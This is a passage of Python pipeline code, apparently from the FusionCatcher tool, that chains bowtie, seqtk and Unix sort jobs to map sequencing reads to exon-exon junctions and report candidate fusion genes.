job.add('seq',kind='parameter') job.add('-L',options.trim_3end_keep,kind='parameter') job.add('-',kind='parameter') job.add('>',outdir('reads_filtered_psl.fq.')+str(i),kind='output',dest_list='trim22') job.run() job.sink(job.trim22, outdir('trim22.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('trim22.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_psl_1.fq'),kind='output') job.run() job.clean(job.trim22,temp_path=temp_flag) job.add('cat',kind='program') job.add('',outdir('reads_filtered_psl_0.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_psl_1.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_psl.fq'),kind='output') job.run() job.clean(outdir('reads_filtered_psl_temp22.fq'),temp_path=temp_flag) if nucleotides_ee > options.limit_bowtie: if not candidates: job.add(_FC_+'split-fasta.py',kind='program') job.add('--size',outdir('exon-exon_junction_cut__nuc.txt'),kind='input') job.add('--seqs',outdir('exon-exon_junction_cut__seq.txt'),kind='input') job.add('--threshold',options.limit_bowtie,kind='parameter') job.add('-i',outdir('exon-exon_junction_cut.fa'),kind='input') job.add('-o',outdir('exon-exon_junction_cut_split.fa'),kind='output') job.run() parts = [el.strip() for el in file(outdir('exon-exon_junction_cut_split.fa'),'r').readlines()] for i,part in enumerate(parts): if not candidates: job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',part,kind='input') job.add('',part+'_dir/',kind='output') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1000',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(part+'_dir','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq.'+str(i)),kind='output',dest_list='exonexon22_un') # here is the result job.add('--tryhard',kind='parameter') job.add('',part+'_dir/',kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_psl.fq'),kind='input',temp_path=temp_flag) job.add('2>',outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map22.stdout.txt.'+str(i)),kind='output',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('-t',"'\t'",kind='parameter') job.add('-k','3,3',kind='parameter') job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref22.map.'+str(i)),kind='output',dest_list='exonexon22') job.run() job.clean(outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map22.stdout.txt.'+str(i)),temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq.'+str(i))),id="###reads_fnmgnmteef22.fq."+str(i)+"###"): job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq.'+str(i)),kind='output') job.run() job.sink(job.exonexon22, outdir('exonexon22.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('exonexon22.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref22.map'),kind='output') job.run() job.clean(job.exonexon22,temp_path=temp_flag) job.sink(job.exonexon22_un, outdir('exonexon22_un.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('exonexon22_un.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'),kind='output') job.run() job.clean(job.exonexon22_un,temp_path=temp_flag) else: if not candidates: job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',outdir('exon-exon_junction_cut.fa'),kind='input') job.add('',outdir('exon-exon_fusion-genes/'),kind='output') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1000',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(outdir('exon-exon_fusion-genes','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'),kind='output') # here is the result job.add('--tryhard',kind='parameter') job.add('',outdir('exon-exon_fusion-genes/'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_psl.fq'),kind='input',temp_path=temp_flag) job.add('2>',outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map22.stdout.txt'),kind='output',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('-t',"'\t'",kind='parameter') job.add('-k','3,3',kind='parameter') job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref22.map'),kind='output') job.run() job.clean(outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map22.stdout.txt'),temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq')),id="###reads_fnmgnmteef22.fq###"): job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'),kind='output') job.run() if job.iff(empty(outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map')),id="###reads-mapped-ref.map###"): job.link(outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref22.map'), outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.map'), temp_path=temp_flag) else: job.add('cat',kind='program') job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref22.map'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('-t',"'\t'",kind='parameter') job.add('-k','3,3',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.map'),kind='output') job.run() # this fixes a bug for options.trim-psl if options.trim_psl: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'), temp_path=temp_flag) job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'),temp_path=temp_flag) else: job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),temp_path=temp_flag) # most the time is going thru this job.add(_SK_+'seqtk',kind='program') # get rid of the pairs reads which support the fusion job.add('subseq',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_transcriptome22.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big_.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk>")) # remove the mapped reads which may look unmapped when the trimming has happened job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f','1',kind='parameter') job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.txt'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('-e',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big_.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'),kind='output') job.run() # job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'), # outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'), # temp_path=temp_flag) if candidates or double_bowtie: # continuing the original stuff # # more filtering -- remove the reads from the exon-exon junctions which # have the pair read mapping on a totally different gene than those # involved in the exon-exon junction job.add(_FC_+'remove_reads_exon_exon_map.py',kind='program') if not options.all_reads_junction: job.add('--only_pairs',kind='parameter') job.add('--input_exon_exon',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.map'),kind='input',temp_path=temp_flag) job.add('--input_transcriptome', outdir('reads_filtered_transcriptome_sorted-read_end_important.map'), kind = 'input', temp_path = 'no' if (((not options.skip_blat) or (not options.skip_star) or (not options.skip_bowtie2)) and (not options.all_reads_junction)) else temp_flag) job.add('--output',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_filtered.map'),kind='output') job.run() # analyze the exon-exon mappings job.add(_FC_+'analyze_exon-exon_mappings.py',kind='program') job.add('--input',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_filtered.map'),kind='input',temp_path=temp_flag) job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') job.add('--output',outdir('candidate_fusion-genes_exon-exon-junctions_summary.txt'),kind='output') job.add('--output_henrik',outdir('candidate_fusion-genes_exon-exon-junctions_reads-positions.txt'),kind='output') job.run() # summary the exon-exon mappings job.add(_FC_+'build_report_fusions_map.py',kind='program') job.add('--suporting_unique_reads',spanning_reads_bowtie,kind='parameter') job.add('--anchor2',length_anchor2,kind='parameter') job.add('--input_exons',datadir('exons.txt'),kind='input') job.add('--input_candidate_fusion_genes',outdir('candidate_fusion-genes_further.txt'),kind='input') job.add('--input_fusion_summary',outdir('candidate_fusion-genes_exon-exon-junctions_summary.txt'),kind='input',temp_path=temp_flag) job.add('--input_fusion_summary_more',outdir('candidate_fusion-genes_exon-exon-junctions_reads-positions.txt'),kind='input',temp_path=temp_flag) job.add('--input_candidate_fusions_missing_mates',outdir('candidate_fusion-genes_missing_mates.txt'),kind='input',temp_path=temp_flag) job.add('--input_unmapped_reads',outdir('reads_ids_unmapped.txt'),kind='input') job.add('--input_fasta_juncs',outdir('exon-exon_junction_cut.fa'),kind='input',temp_path=temp_flag) # if options.reads_preliminary_fusions: # job.add('--output_all_candidate_fusion_genes_reads',outdir('pre-fusion'),kind='output') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') if (not options.skip_blat) or (not options.skip_star) or (not options.skip_bowtie2): job.add('--input_fastq',outdir('original_important.fq.gz'),kind='input') # needed for BLAT later job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input') else: job.add('--input_fastq',outdir('original_important.fq.gz'),kind='input',temp_path=temp_flag if options.skip_spotlight else 'no') job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input',temp_path=temp_flag if options.skip_spotlight else 'no') if options.psl_visualization and not empty(datadir('genome.2bit')): job.add('--input_genome_2bit',datadir('genome.2bit'),kind='input') job.add('--psl_alignment_type','web',kind='parameter') if _BT_: job.add('--blat-dir',_BT_,kind='parameter') if options.sam_visualization: job.add('--input_genome_bowtie2',datadir('genome_index2/index'),kind='input') job.add('--sam_alignment','20',kind='parameter') job.add('--threads',options.processes,kind='parameter') if _B2_: job.add('--bowtie2-dir',_B2_,kind='parameter') if options.assembly: job.add('--velvet',kind='parameter') if _VT_: job.add('--velvet-dir',_VT_,kind='parameter') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BOWTIE.txt'),kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BOWTIE.zip'),kind='output') job.run() ################################################################################## ################################################################################## ################################################################################## # Find fusion genes using BLAT/STAR/BOWTIE2 ################################################################################## ################################################################################## ################################################################################## ################################################################################## if ((not options.skip_blat) or (not options.skip_star) or (not options.skip_bowtie2)) and (candidates or double_bowtie): # generate the gene-gene junctions in FASTA format job.add(_FC_+'generate_gene-gene_junctions.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_exon-exon.txt'),kind='input',temp_path=temp_flag) job.add('--input_database',datadir('genes.fa'),kind='input') job.add('--input_exons',datadir('exons.txt'),kind='input') job.add('--reverse',kind='parameter') job.add('--longest',outdir('gene-gene_longest.txt'),kind='output') job.add('--output',outdir('gene-gene.fa'),kind='output') job.add('--output_genes',outdir('gene-gene_unique.fa'),kind='output') job.add('--output_genes_count_seq',outdir('gene-gene_unique__seq.txt'),kind='output') job.add('--output_genes_count_nuc',outdir('gene-gene_unique__nuc.txt'),kind='output') job.run() nucleotides_ggu = int(float(file(outdir('gene-gene_unique__nuc.txt'),'r').readline().strip())) # job.add('du',kind='program') # job.add('-b',outdir('gene-gene.fa'),kind='input') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('cut',kind='parameter') # job.add('-f','1',kind='parameter') # job.add('>',outdir('gene-gene__nuc.txt'),kind='output') # job.run() # get the length of the FASTA file job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-v','"^>"',kind='parameter') job.add('',outdir('gene-gene.fa'),kind='input') job.add('|',kind='parameter') job.add('wc',kind='parameter') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add("'{print $3-$1}'",kind='parameter') job.add('>',outdir('gene-gene__nuc.txt'),kind='output') job.run() nucleotides_gg = int(float(file(outdir('gene-gene__nuc.txt'),'r').readline().strip())) job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-c',kind='parameter') job.add("'^>'",outdir('gene-gene.fa'),kind='input') job.add('>',outdir('gene-gene__seq.txt'),kind='output') job.run(successful_exit_status=(0,1)) sequences_gg = int(float(file(outdir('gene-gene__seq.txt'),'r').readline().strip())) if options.trim_psl: # link job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl.fq'), temp_path = temp_flag) else: # job.add('extract_reads_ids.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.txt'),kind='output') # job.run() # extract reads ids job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("'NR%4==1 {print substr($0,2)}'",outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.txt'),kind='output') job.run() # extract the short reads which mapped on the transcriptome and do not map on genome # job.add('extract_short_reads.py',kind='program') # job.add('--input',outdir('original.fq.gz'),kind='input') # job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.txt'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_original.fq'),kind='output') # job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') # job.run(error_message = ("If this fails due to a memory error then lowering the "+ # "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ # "of FusionCatcher and running it again might help!")) if min(max_len_reads,options.trim_psl_3end_keep) > min_len_reads : # add also the reads of the paired reads which support the candidate fusion genes (some of them might overlap the fusion junction) job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'),kind='output') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.txt'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'), temp_path = temp_flag) if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('original_important.fq.gz'),kind='input') job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'),kind='input') job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_temp.fq'),kind='output') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'),kind='input') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_temp.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_temp.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'),temp_path=temp_flag) # link #job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_original.fq'), # outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl.fq'), # temp_path=temp_flag) job.add(_FC_+'fastq_b2n.py',kind='program') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_temp.fq'),kind='input',temp_path=temp_flag) job.add('--replacement','A',kind='parameter') job.add('--ambiguous',kind='parameter') job.add('--sanger',kind='parameter') job.add('--threshold',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file = 'yes') job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl.fq'),kind='output') job.run() job.add(_FC_+'trim_poly_tails.py',kind='program') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl.fq'),kind='input',temp_path=temp_flag) job.add('--repeats',length_anchor_minimum - 1,kind='parameter') #job.add('--skip_reads',kind='parameter') #job.add('--replace',kind='parameter') # test eml4 job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus_b.fq'),kind='output') job.run() # clip the low quality ends job.add(_FC_+'clip_quality.py',kind='program') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('-t',options.trim_quality,kind='parameter') # below Q5 trimming starts job.add('--score-type','sanger',kind='parameter') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus_b.fq'),kind='input',temp_path=temp_flag) job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus_temp.fq'),kind='output') job.run() if options.trim_psl_5end and options.trim_5end > 0: # trim 5 job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-b',options.trim_5end,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus_temp.fq'),kind='input', temp_path='no') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus.fq'),kind='output') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus_temp.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus.fq'), temp_path = temp_flag) # remove reads shorter than a given threshold # job.add('remove_shorter_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus.fq'),kind='input',temp_path=temp_flag) # job.add('--threshold',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq'),kind='output') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq'),kind='output') job.run() if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq')), id = "#reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq#"): candidates = False t = ["="*80, "WARNING: No candidate fusion genes have been found using BLAT/STAR/BOWTIE2!", "="*80 ] job.write(t, stderr=True) if job.run(): file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]]) if options.keep_unmapped_reads: # job.add('echo',kind='program') # job.add('-n','""',kind='parameter') # job.add('>',outdir('unmapped-reads.fq.gz'), kind='output') # job.run() job.add('touch',kind='program') job.add('',outdir('unmapped-reads.fq.gz'), kind='output') job.run() # summary the exon-exon mappings # just get the header if not options.skip_blat: job.add(_FC_+'build_report_fusions_map.py',kind='program') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BLAT.txt'), kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BLAT.zip'), kind='output') job.run() if not options.skip_star: job.add(_FC_+'build_report_fusions_map.py',kind='program') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_STAR.txt'), kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_STAR.zip'), kind='output') job.run() if not options.skip_bowtie2: job.add(_FC_+'build_report_fusions_map.py',kind='program') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BOWTIE2.txt'), kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BOWTIE2.zip'), kind='output') job.run() # if not options.skip_bwa: # job.add(_FC_+'build_report_fusions_map.py',kind='program') # job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BWA.txt'), kind='output') # job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BWA.zip'), kind='output') # job.run() else: job.add('printf',kind='program') job.add(('"\nCounts of reads before BLAT/STAR/BOWTIE2 alignment:\n'+ '----------------------------------------------------------\n"'),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq'),kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() # trim the reads given as input to BLAT input_file = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq') output_file = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq') if options.trim_psl_3end_keep > 25 and ((options.trim_psl_3end_keep < max_len_reads and (not options.trim_psl)) or (options.trim_psl and min_len_reads > options.trim_psl_3end_keep)): # trim from 3-end to have the reads all the same length # job.add('trim_reads.py',kind='program') # job.add('--input',input_file,kind='input',temp_path=temp_flag) # job.add('--output',output_file,kind='output') # job.add('--trim_end','3',kind='parameter') # job.add('--final_size',options.trim_psl_3end_keep,kind='parameter') # job.run() # # original # job.add('seqtk',kind='program') # job.add('trimfq',kind='parameter') # job.add('-l','1',kind='parameter') # #job.add('-q','0',kind='parameter') # job.add('-B',options.trim_psl_3end_keep,kind='parameter') # job.add('',input_file,kind='input', temp_path=temp_flag) # job.add('>',output_file,kind='output') # job.run() # try to trim only the unmapped read (do not trim the paired reads supporting the fusions) if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',input_file,kind='input') job.add('--list',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('--output',outdir('reads_not-for-trimming.fq'),kind='output') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',input_file,kind='input') job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('>',outdir('reads_not-for-trimming.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',input_file,kind='input') job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('',outdir('reads_not-for-trimming.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') 